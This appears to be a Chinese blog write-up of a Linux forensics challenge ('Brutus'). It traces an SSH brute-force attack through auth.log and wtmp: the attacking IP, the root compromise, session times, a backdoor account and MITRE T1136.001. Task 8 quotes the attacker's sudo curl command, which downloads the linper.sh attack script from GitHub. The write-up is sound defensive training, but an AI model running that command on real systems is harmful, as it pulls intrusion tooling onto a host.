当前位置: 首页 > news >正文

[SL] Brutus Linux登入紀錄分析+MITRE ATTCK+linper.sh本地权限提升工具

QA

QA
1. 攻擊者用來進行暴力破解的 IP 位址是什麼?65.2.161.68
2. 攻擊者成功入侵的帳戶名稱是什麼?root
3. 攻擊者手動登入並建立終端機會話的 UTC 時間戳是什麼?(wtmp 紀錄中找)2024-03-06 06:32:45
4. 攻擊者這個 SSH 會話的會話編號是多少?37
5. 攻擊者為了持久化,在系統中新增的高權限帳戶名稱是什麼?cyberjunkie
6. MITRE ATT&CK 中用於「新增帳戶」持久化的子技術 ID 是什麼?T1136.001
7. 根據 auth.log,攻擊者第一次 SSH 會話的結束時間是什麼時候?2024-03-06 06:37:24
8. 攻擊者登入後門帳戶後,利用高權限用 sudo 執行的完整指令是什麼?/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh

TASK1

image.png

65.2.161.68

TASK2

image-2.png

root

TASK3:Linux 系統登入紀錄 原樣輸出

$ utmpdump wtmp

image-3.png

2024-03-06 06:32:45

TASK4

image-4.png

37

TASK5

image-5.png

cyberjunkie

TASK6:MITRE ATT&CK sub-technique ID

TXXXX → 主技術(Technique).XXX → 子技術(Sub-technique)

示例:

編號名稱解釋
T1136Create Account建立帳戶(新增使用者帳戶)
T1136.001Local Account新增「本地帳戶」

T1136.001

TASK7:查看 Linux 登入歷史記錄快速查詢

image-6.png

06:18

$ last -F -f wtmp

image-7.png

2024-03-06 06:37:24

TASK8:本地权限提升工具linper.sh

image-8.png

/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh

http://www.dtcms.com/a/275077.html

相关文章:

  • 面向构件的编程(COP)深度解析:构建模块化系统的工程范式
  • Debian:从GNOME切换到Xfce
  • 二叉树的层次遍历(BFS)
  • ## SQLITE:多表(子母表)联合查询【DA_Project笔记】
  • 032_super关键字与父类访问
  • CSP-J/S 参赛选手注册报名流程
  • 如何应对风险和不确定性
  • 还在靠防火墙硬抗?网络安全需要从“单点防御“转向“系统化防护“!
  • AGV穿梭不“迷路”CCLinkIE转Modbus TCP的衔接技巧
  • 【AI大模型】超越RAG的搜索革命!分层框架让AI像专家团队一样深度思考
  • 三轴云台之三维重建算法篇
  • Microbiome:如何区分肠道中的有益菌?有害菌?
  • 嵌入式 数据结构学习 (六) 树、哈希表与内核链表
  • 【常见分布及其特征(2)】离散型随机变量-伯努利分布(0-1分布)
  • 滚珠导轨在发动机加工设备中起着什么作用?
  • Django老年健康问诊系统 计算机毕业设计源码32407
  • Windows11桌面解锁守护脚本
  • 05 唤醒词检测:让语音助手随时待命
  • 【跟着PMP学习项目管理】每日一练 - 3
  • 游戏gm系统
  • Kamailio 5.8.3与rtpengine双网卡SBC集成要点
  • TCP服务器与客户端三种方法实现
  • SHA-256算法流程分析与演示——github工程完善
  • 网络安全基础作业
  • 连锁门店如何统一固定资产盘点?总部+门店协同攻略
  • 佳能(Canon)摄像机存储卡提示格式化的恢复方法
  • 七月份了,考研数学该怎么复习?
  • AD736ARZ-R7精密真有效值转换器 高精度测量的首选方案
  • Telegraf vs. Logstash:实时数据处理架构中的关键组件对比
  • 网络编程(基本概念)